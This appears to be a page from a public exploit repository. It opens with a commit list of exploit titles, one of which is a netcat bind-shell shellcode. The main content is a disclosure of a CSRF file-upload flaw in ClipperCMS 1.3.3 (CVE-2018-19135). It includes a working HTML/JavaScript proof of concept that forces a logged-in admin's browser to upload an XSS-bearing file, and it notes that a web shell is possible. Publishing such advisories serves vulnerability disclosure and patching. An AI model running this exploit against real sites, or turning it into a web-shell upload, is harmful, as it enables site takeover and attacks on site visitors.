3a7153b2ac
24 changes to exploits/shellcodes CuteFTP Mac 3.1 - Denial of Service (PoC) Evince 3.24.0 - Command Injection Cisco Immunet < 6.2.0 / Cisco AMP For Endpoints 6.2.0 - Denial of Service XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode) xorg-x11-server < 1.20.1 - Local Privilege Escalation Data Center Audit 2.6.2 - 'username' SQL Injection Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal Paroiciel 11.20 - 'tRecIdListe' SQL Injection Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal / Cross-Site Scripting Paroiciel 11.20 - 'tRecIdListe' SQL Injection The Don 1.0.1 - 'login' SQL Injection Facturation System 1.0 - 'modid' SQL Injection The Don 1.0.1 - 'login' SQL Injection Facturation System 1.0 - 'modid' SQL Injection GPS Tracking System 2.12 - 'username' SQL Injection ServerZilla 1.0 - 'email' SQL Injection GPS Tracking System 2.12 - 'username' SQL Injection ServerZilla 1.0 - 'email' SQL Injection Nominas 0.27 - 'username' SQL Injection CentOS Web Panel 0.9.8.740 - Cross-Site Request Forgery / Cross-Site Scripting Surreal ToDo 0.6.1.2 - SQL Injection Surreal ToDo 0.6.1.2 - Local File Inclusion Alienor Web Libre 2.0 - SQL Injection Musicco 2.0.0 - Arbitrary Directory Download Data Center Audit 2.6.2 - Cross-Site Request Forgery (Update Admin) Tina4 Stack 1.0.3 - SQL Injection / Database File Download Tina4 Stack 1.0.3 - Cross-Site Request Forgery (Update Admin) Easyndexer 1.0 - Arbitrary File Download ABC ERP 0.6.4 - Cross-Site Request Forgery (Update Admin) Gumbo CMS 0.99 - SQL Injection Silurus Classifieds Script 2.0 - 'wcategory' SQL Injection ClipperCMS 1.3.3 - Cross-Site Request Forgery (File Upload) Alive Parish 2.0.4 - SQL Injection / Arbitrary File Upload Maitra Mail Tracking System 1.7.2 - SQL Injection / Database File Download Webiness Inventory 2.3 - Arbitrary File Upload / Cross-Site Request Forgery (Add Admin) Webiness Inventory 2.3 - SQL Injection SIPve 0.0.2-R19 - SQL Injection Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)
82 lines
No EOL
3.3 KiB
Text
82 lines
No EOL
3.3 KiB
Text
# Exploit Title: ClipperCMS 1.3.3 File Upload CSRF Vulnerability
|
|
# Date: 2018-11-11
|
|
# Exploit Author: Ameer Pornillos
|
|
# Website: http://ethicalhackers.club
|
|
# Vendor Homepage: http://www.clippercms.com/
|
|
# Software Link: https://github.com/ClipperCMS/ClipperCMS/releases/tag/clipper_1.3.3
|
|
# Version: 1.3.3
|
|
# Tested on: Windows 10 x64 (XAMPP, Firefox)
|
|
# CVE : CVE-2018-19135
|
|
|
|
* Description:
|
|
|
|
ClipperCMS 1.3.3 does not have CSRF protection on its kcfinder file upload
|
|
which is being used by default. This can be used by an attacker to perform
|
|
actions for an admin (or any user with file upload capability). With this
|
|
vulnerability, it can automatically upload file/s (by default it allows
|
|
aac,au,avi,css,cache,doc,docx,gz,gzip,htm,html,js,mp3,mp4,mpeg,mpg,ods,odp,odt,pdf,ppt,pptx,rar,tar,tgz,txt,wav,wmv,xls,xlsx,xml,z,zip
|
|
as file types). Note that web shell that can be used for remote code
|
|
execution can be achieved depending on the file types being accepted.
|
|
Uploaded file can be accessed publicly on the "/assets/files" directory
|
|
(e.g. uploaded a malicious html file with filename: poc.html file =>
|
|
http://<clipperwebsite>/clipper/assets/files/poc.html).
|
|
This can lead for the website to be host unintended file/s.
|
|
|
|
*Steps to reproduce:
|
|
|
|
Admin (or user with file upload capability) logged in ClipperCMS 1.3.3 ->
|
|
browse/open a controlled website (e.g. by link or open PoC below in a
|
|
browser where admin/user logged in to ClipperCMS 1.3.3) with the poc below
|
|
-> file is uploaded and can be accessed on http://
|
|
<clipperwebsite>/clipper/assets/files/poc.html
|
|
|
|
*Proof of Concept:
|
|
|
|
PoC below will automatically upload a "poc.html" file with simple XSS
|
|
payload. Steps above are how to make use of the PoC.
|
|
|
|
<html>
|
|
<!-- CSRF Auto Upload File ClipperCMS PoC -->
|
|
<body>
|
|
<script>
|
|
var xhr = new XMLHttpRequest();
|
|
xhr.open("POST",
|
|
"http:\/\/clipperwebsite\/clipper\/manager\/media\/browser\/kcfinder\/browse.php?type=files&lng=en&act=upload",
|
|
true);
|
|
xhr.setRequestHeader("Accept",
|
|
"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
|
|
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
|
|
xhr.setRequestHeader("Content-Type", "multipart\/form-data;
|
|
boundary=---------------------------167248871811044278431417596280");
|
|
xhr.withCredentials = true;
|
|
var body =
|
|
"-----------------------------167248871811044278431417596280\r\n" +
|
|
"Content-Disposition: form-data; name=\"upload[]\";
|
|
filename=\"poc.html\"\r\n" +
|
|
"Content-Type: text/html\r\n" +
|
|
"\r\n" +
|
|
"\x3cscript\x3ealert(\'XSS\')\x3c/script\x3e\n" +
|
|
"\r\n" +
|
|
"-----------------------------167248871811044278431417596280\r\n"
|
|
+
|
|
"Content-Disposition: form-data; name=\"dir\"\r\n" +
|
|
"\r\n" +
|
|
"files\r\n" +
|
|
|
|
"-----------------------------167248871811044278431417596280--\r\n";
|
|
var aBody = new Uint8Array(body.length);
|
|
for (var i = 0; i < aBody.length; i++)
|
|
aBody[i] = body.charCodeAt(i);
|
|
xhr.send(new Blob([aBody]));
|
|
</script>
|
|
</body>
|
|
</html>
|
|
|
|
*Proof of Concept Demo:
|
|
|
|
Actual video demo of the vulnerability being exploited is available on:
|
|
https://youtu.be/bEYqb99MdYs
|
|
|
|
*Reference:
|
|
|
|
https://github.com/ClipperCMS/ClipperCMS/issues/494 |